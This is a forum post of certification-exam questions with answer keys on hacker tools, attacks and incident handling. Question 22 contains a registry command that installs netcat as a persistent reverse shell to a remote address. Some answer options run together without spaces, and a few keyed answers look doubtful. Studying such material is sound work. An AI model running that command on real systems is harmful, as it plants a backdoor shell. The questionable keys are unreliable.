QUESTION 1
Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti- spyware software, and keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds that his computer is even more noticeably slow. He also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Adam notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam thinks this is very odd. Which of the following is the mostly likely the cause of the problem?
A. Computerisinfectedwiththestealthkernellevelrootkit. B. Computerisinfectedwithstealthvirus.
C. Computer is infected with the Stealth Trojan Virus.
D. Computer is infected with the Self-Replication Worm.
Correct Answer: A Section: (none) Explanation
Explanation/Reference:
QUESTION 2
Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross-Site Scripting attack Ryan intends to do?
A. Nonpersistent
B. DocumentObjectModel(DOM) C. SAX
D. Persistent
Correct Answer: D
Section: (none) Explanation
Explanation/Reference:
QUESTION 3
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?
A. Denial-of-Service B. Man-in-the-middle C. Brute Force
D. Vulnerability
Correct Answer: C Section: (none) Explanation
Explanation/Reference:
QUESTION 4
Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services.
Which of the following are the techniques used for network mapping by large organizations? Each correct answer represents a complete solution. Choose three.
A. Packetcrafting
B. Routeanalytics
C. SNMP-based approaches D. Active Probing
Correct Answer: BCD Section: (none) Explanation
Explanation/Reference:
QUESTION 5
Which of the following functions can you use to mitigate a command injection attack? Each correct answer represents a part of the solution. Choose all that apply.
A. escapeshellarg() B. escapeshellcmd() C. htmlentities()
D. strip_tags()
Correct Answer: AB Section: (none) Explanation
Explanation/Reference:
QUESTION 6
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?
A. Theattackwassocialengineeringandthefirewalldidnotdetectit.
B. Securitywasnotcompromisedasthewebpagewashostedinternally. C. The attack was Cross Site Scripting and the firewall blocked it.
D. Security was compromised as keylogger is invisible for firewall.
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 7
Which of the following statements about a Trojan horse are true? Each correct answer represents a complete solution. Choose two. A. Itisamacroorscriptthatattachesitselftoafileortemplate.
B. ThewritersofaTrojanhorsecanuseitlatertogainunauthorizedaccesstoacomputer. C. It is a malicious software program code that resembles another normal program.
D. It infects the boot record on hard disks and floppy disks.
Correct Answer: BC Section: (none) Explanation
Explanation/Reference: QUESTION 8
In which of the following attacking methods does an attacker distribute incorrect IP address?
A. IPspoofing
B. Macflooding
C. DNS poisoning
D. Man-in-the-middle
Correct Answer: C Section: (none) Explanation
Explanation/Reference: QUESTION 9
Which of the following types of attacks is mounted with the objective of causing a negative impact on the performance of a computer or network?
A. Vulnerabilityattack
B. Man-in-the-middleattack
C. Denial-of-Service (DoS) attack D. Impersonation attack
Correct Answer: C Section: (none) Explanation
Explanation/Reference:
QUESTION 10
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:
C:\whisker.pl -h target_IP_address
--whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - = = Host: target_IP_address
= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22 + 200 OK: HEAD /cgi-bin/printenv
John recognizes /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We_are_secure server. Which of the following statements about 'Printenv' vulnerability are true?
Each correct answer represents a complete solution. Choose all that apply.
A. Thisvulnerabilityhelpsinacrosssitescriptingattack.
B. 'Printenv'vulnerabilitymaintainsalogfileofuseractivitiesontheWebsite,whichmaybeusefulfortheattacker. C. The countermeasure to 'printenv' vulnerability is to remove the CGI script.
D. With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.
Correct Answer: ACD Section: (none) Explanation
Explanation/Reference: QUESTION 11
Which of the following tools can be used for steganography? Each correct answer represents a complete solution. Choose all that apply.
A. Imagehide B. Stegbreak C. Snow.exe
D. Anti-x
Correct Answer: AC Section: (none) Explanation
Explanation/Reference: QUESTION 12
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?
A. Fragroute B. Absinthe C. Stick
D. ADMutate
Correct Answer: B Section: (none) Explanation
Explanation/Reference:
QUESTION 13
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks? Each correct answer represents a complete solution. Choose all that apply.
A. Spoofingattack
B. SYNfloodattack C. Password cracking D. RF jamming attack
Correct Answer: AB Section: (none) Explanation
Explanation/Reference:
QUESTION 14
Which of the following tools can be used to perform brute force attack on a remote database? Each correct answer represents a complete solution. Choose all that apply.
A. SQLBF B. SQLDict C. FindSA D. nmap
Correct Answer: ABC Section: (none) Explanation
Explanation/Reference: QUESTION 15
Which of the following are the primary goals of the incident handling team? Each correct answer represents a complete solution. Choose all that apply.
A. Freezethescene.
B. Repairanydamagecausedbyanincident. C. Prevent any further damage.
D. Inform higher authorities.
Correct Answer: ABC Section: (none) Explanation
Explanation/Reference:
QUESTION 16
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?
A. Scanning
B. Coveringtracks C. Reconnaissance D. Gaining access
Correct Answer: C Section: (none) Explanation
Explanation/Reference:
QUESTION 17
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single domain single forest network. The company has three Windows 2008 file servers, 150 Windows XP Professional, thirty UNIX-based client computers. The network users have identical user accounts for both Active Directory and the UNIX realm. You want to ensure that the UNIX clients on the network can access the file servers. You also want to ensure that the users are able to access all resources by logging on only once, and that no additional software is installed on the UNIX clients. What will you do to accomplish this task?
Each correct answer represents a part of the solution. Choose two.
A. Configureadistributedfilesystem(Dfs)onthefileserverinthenetwork.
B. EnabletheNetworkFileSystem(NFS)componentonthefileserversinthenetwork. C. Configure ADRMS on the file servers in the network.
D. Enable User Name Mapping on the file servers in the network.
Correct Answer: BD Section: (none) Explanation
Explanation/Reference:
QUESTION 18
You work as a Network Administrator for InformSec Inc. You find that the TCP port number 23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?
A. Tripwire
B. SubSeven C. Netstat
D. Fport
Correct Answer: D Section: (none) Explanation
Explanation/Reference:
QUESTION 19
Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we-are-secure.com. She wants to test a DoS attack on the We- are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server. Which of the following DoS attacks is Maria using to accomplish her task?
A. Pingfloodattack B. FraggleDoSattack C. Teardrop attack
D. Smurf DoS attack
Correct Answer: B Section: (none) Explanation
Explanation/Reference:
QUESTION 20
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.
A. CustomizeIIS6.0todisplayalegalwarningpageonthegenerationofthe404.2and404.3errors. B. MovetheWebStore1servertotheinternalnetwork.
C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
D. Move the computer account of WebStore1 to the Remote organizational unit (OU).
Correct Answer: AC Section: (none) Explanation
Explanation/Reference: QUESTION 21
Which of the following attacks is specially used for cracking a password?
A. PINGattack
B. Dictionaryattack C. Vulnerabilityattack D. DoS attack
Correct Answer: B Section: (none) Explanation
Explanation/Reference: QUESTION 22
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.
A. Youwanttoperformbannergrabbing.
B. YouwanttosettheNetcattoexecutecommandanytime. C. You want to put Netcat in the stealth mode.
D. You want to add the Netcat command to the Windows registry.
Correct Answer: BCD Section: (none) Explanation
Explanation/Reference: QUESTION 23
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
A. Rainbowattack
B. BruteForceattack C. Dictionaryattack D. Hybrid attack
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 24
Which of the following tools is used to download the Web pages of a Website on the local system?
A. wget
B. jplag
C. Nessus D. Ettercap
Correct Answer: A Section: (none) Explanation
Explanation/Reference:
QUESTION 25
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?
A. Win32/Agent
B. WMA/TrojanDownloader.GetCodec C. Win32/Conflicker
D. Win32/PSW.OnLineGames
Correct Answer: C Section: (none) Explanation
Explanation/Reference: QUESTION 26
Which of the following applications is an example of a data-sending Trojan?
A. SubSeven
B. SennaSpyGenerator C. Firekiller 2000
D. eBlaster
Correct Answer: D Section: (none) Explanation
Explanation/Reference:
QUESTION 27
Adam works as an Incident Handler for Umbrella Inc. He has been sent to the California unit to train the members of the incident response team. As a demo project he asked members of the incident response team to perform the following actions:
Remove the network cable wires.
Isolate the system on a separate VLAN
Use a firewall or access lists to prevent communication into or out of the system. Change DNS entries to direct traffic away from compromised system
Which of the following steps of the incident handling process includes the above actions?
A. Identification B. Containment C. Eradication D. Recovery
Correct Answer: B Section: (none) Explanation
Explanation/Reference: QUESTION 28
Which of the following statements are true about worms?
Each correct answer represents a complete solution. Choose all that apply.
A. Wormscauseharmtothenetworkbyconsumingbandwidth,whereasvirusesalmostalwayscorruptormodifyfilesonatargetedcomputer. B. WormscanexistinsidefilessuchasWordorExceldocuments.
C. One feature of worms is keystroke logging.
D. Worms replicate themselves from one system to another without using a host file.
Correct Answer: ABD Section: (none) Explanation
Explanation/Reference: QUESTION 29
Which of the following commands is used to access Windows resources from Linux workstation?
A. mutt
B. scp
C. rsync
D. smbclient
Correct Answer: D Section: (none) Explanation
Explanation/Reference: QUESTION 30
Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?
A. Synflood
B. Pingstorm C. Smurf attack D. DDOS
Correct Answer: D Section: (none) Explanation
Explanation/Reference: QUESTION 31
In which of the following DoS attacks does an attacker send an ICMP packet larger than 65,536 bytes to the target system?
A. Pingofdeath B. Jolt
C. Fraggle
D. Teardrop
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 32
Which of the following tools combines two programs, and also encrypts the resulting package in an attempt to foil antivirus programs?
A. TrojanMan B. EliteWrap C. Tiny
D. NetBus
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 33
What is the major difference between a worm and a Trojan horse?
A. Awormspreadsviae-mail,whileaTrojanhorsedoesnot.
B. Awormisaformofmaliciousprogram,whileaTrojanhorseisautility.
C. A worm is self replicating, while a Trojan horse is not.
D. A Trojan horse is a malicious program, while a worm is an anti-virus software.
Correct Answer: C Section: (none) Explanation
Explanation/Reference: QUESTION 34
Which of the following statements are true about firewalking?
Each correct answer represents a complete solution. Choose all that apply.
A. Tousefirewalking,theattackerneedstheIPaddressofthelastknowngatewaybeforethefirewallandtheIPaddressofahostlocatedbehindthefirewall. B. Inthistechnique,anattackersendsacraftedpacketwithaTTLvaluethatissettoexpireonehoppastthefirewall.
C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.
D. Firewalking works on the UDP packets.
Correct Answer: ABC
Section: (none) Explanation
Explanation/Reference: QUESTION 35
Which of the following statements are true about a keylogger?
Each correct answer represents a complete solution. Choose all that apply.
A. Itrecordsallkeystrokesonthevictim'scomputerinapredefinedlogfile.
B. Itcanberemotelyinstalledonacomputersystem.
C. It is a software tool used to trace all or specific activities of a user on a computer. D. It uses hidden code to destroy or scramble data on the hard disk.
Correct Answer: ABC Section: (none) Explanation
Explanation/Reference:
QUESTION 36
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?
A. Bruteforceattack
B. Mailbombing
C. Distributed denial of service (DDOS) attack D. Malware installation from unknown Web sites
Correct Answer: D Section: (none) Explanation
Explanation/Reference:
QUESTION 37
Adam works as a Network Administrator for Examkiller Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?
A. SPI
B. Distributivefirewall C. HoneyPot
D. Internet bot
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 38
Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?
A. Spector
B. MagicLantern C. eblaster
D. NetBus
Correct Answer: A Section: (none) Explanation
Explanation/Reference: QUESTION 39
You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close. Sometimes, IPID is being incremented by more than one value. What may be the reason?
A. Thefirewallisblockingthescanningprocess.
B. Thezombiecomputerisnotconnectedtothewe-are-secure.comWebserver.
C. The zombie computer is the system interacting with some other system besides your computer. D. Hping does not perform idle scanning.
Correct Answer: C Section: (none) Explanation
Explanation/Reference:
SANS Hacker Tools, Techniques, Exploits and Incident Handling Questions + Answers Part 1
-
answerhappygod
- Site Admin
- Posts: 899603
- Joined: Mon Aug 02, 2021 8:13 am